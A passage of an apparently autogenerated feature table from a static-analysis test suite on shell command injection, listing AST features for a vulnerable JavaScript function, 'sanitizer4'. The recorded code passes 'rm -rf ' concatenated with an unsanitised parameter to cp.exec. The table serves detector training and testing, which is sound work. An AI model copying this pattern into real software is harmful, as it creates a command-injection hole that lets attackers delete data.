name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:525:11:525:26 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:525:11:525:26 | "rm -rf " + name | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:525:11:525:26 | "rm -rf " + name | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:525:11:525:26 | "rm -rf " + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:525:11:525:26 | "rm -rf " + name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:525:23:525:26 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:525:23:525:26 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:525:23:525:26 | name | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:525:23:525:26 | name | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:525:23:525:26 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:525:23:525:26 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:527:3:527:4 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:527:3:527:4 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:527:3:527:4 | cp | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:527:3:527:4 | cp | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:527:3:527:4 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:527:3:527:9 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:527:3:527:9 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:527:3:527:9 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:527:3:527:9 | cp.exec | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:527:3:527:9 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:527:3:527:27 | cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:527:3:527:27 | cp.exec ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:527:3:527:27 | cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:527:3:527:27 | cp.exec ... + name) | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:527:3:527:27 | cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:527:3:527:27 | exceptional return of cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:527:3:527:27 | exceptional return of cp.exec ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:527:3:527:27 | exceptional return of cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:527:3:527:27 | exceptional return of cp.exec ... + name) | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:527:3:527:27 | exceptional return of cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:527:6:527:9 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:527:6:527:9 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:527:6:527:9 | exec | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:527:6:527:9 | exec | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:527:6:527:9 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:527:11:527:19 | "rm -rf " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:527:11:527:19 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:527:11:527:19 | "rm -rf " | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:527:11:527:19 | "rm -rf " | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:527:11:527:19 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:527:11:527:19 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:527:11:527:26 | "rm -rf " + name | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:527:11:527:26 | "rm -rf " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:527:11:527:26 | "rm -rf " + name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:527:11:527:26 | "rm -rf " + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:527:11:527:26 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:527:11:527:26 | "rm -rf " + name | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:527:11:527:26 | "rm -rf " + name | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:527:11:527:26 | "rm -rf " + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:527:11:527:26 | "rm -rf " + name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:527:23:527:26 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:527:23:527:26 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:527:23:527:26 | name | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:527:23:527:26 | name | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:527:23:527:26 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:527:23:527:26 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:530:6:530:10 | isNaN | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:530:6:530:10 | isNaN | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:530:6:530:10 | isNaN | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:530:6:530:10 | isNaN | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:530:6:530:10 | isNaN | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:530:6:530:30 | exceptional return of isNaN(p ... e, 10)) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:530:6:530:30 | exceptional return of isNaN(p ... e, 10)) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:530:6:530:30 | exceptional return of isNaN(p ... e, 10)) | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:530:6:530:30 | exceptional return of isNaN(p ... e, 10)) | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:530:6:530:30 | exceptional return of isNaN(p ... e, 10)) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:530:6:530:30 | isNaN(p ... e, 10)) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:530:6:530:30 | 